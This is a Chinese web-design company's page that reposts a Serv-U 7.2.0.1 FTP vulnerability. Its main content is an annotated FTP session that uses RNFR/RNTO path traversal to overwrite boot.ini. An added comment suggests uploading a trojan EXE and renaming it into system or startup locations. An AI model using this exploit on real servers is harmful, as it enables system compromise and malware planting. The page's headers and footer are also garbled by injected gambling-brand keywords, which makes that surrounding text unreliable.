青海龙8国际乐建设、网络推广最好的公司--您身边的龙8国际乐建设专家,马上拿起电话,联系我们:0971-8235355   
青海西宁龙8国际乐建设、龙8国际乐制作公司-西宁威势电子信息服务有限公司
 
西宁威势最新龙8国际乐制做案例展示
Lastest Project
 
当前位置为:首页 >> 操作系统 >> 正文  
龙8国际乐_龙8国际娱乐电脑版_龙8国际娱城手机版

文章来源: 西宁威势电子信息服务有限公司     发布时间:2008-10-26    浏览次数:3501    tags:Serv-U 7.2.0.1 漏洞

好多服务器都装了SERVU为大家提供FTP服务,但是最新的SERVU版本爆出一个很严重的漏洞,网上寻来利用方法如下:

注://后面的为孤行一鬼加注的说明

Serv-U 7.2.0.1 Remote FTP File Replacement Vulnerability (auth)

#Serv-U 7.2.0.1 ftp file replacement
#user must have upload permissions
#
#(x) dmnt 2008-10-01
220 Serv-U FTP Server v7.2 ready...
user test     //连上FTP后输入用户名
331 User name okay, need password.     //SERVU提示用户名已输入,请输入密码
pass test      //用户输入密码test,注,实际输入的时候是没有回显的
230 User logged in, proceed.   //提示登录成功
rnfr any_exist_file.ext    //rnfr指定要被命名的文件的老的路径名,随后必须是一个RNTO
350 File or directory exists, ready for destination name.
rnto ..\..\..\boot.ini      //改成BOOT.INI 真汗.... ,当然黑客们也可以先正常上传一个EXE木马到自己的WEB目录,然后重命名至系统文件或到启动组文件中。。。
250 RNTO command successful.
#boot.ini rewrited


评论列表
正在加载评论……
  
评论   
呢  称:
验证码:
若看不清请点击更换!
内  容:
 
 
  在线洽谈咨询:
点击这里,在线洽谈   点击这里,在线洽谈   点击这里,在线洽谈
乘车路线    汇款方式   加盟合作  人才招聘
 
公司地址:青海省西宁市西关大街73号(三二四部队招行所四楼)     青ICP备13000578号-1 公安机关备案号:63010402000123    
QQ:147399120    mail:lostlove000@163.com    电话: 13897410341    邮编:810000
© Copyright( 2008-2009) QhWins.Com All Rights Reserved    版权所有:西宁威势电子信息服务有限公司 未经书面制授权,请勿随意转载!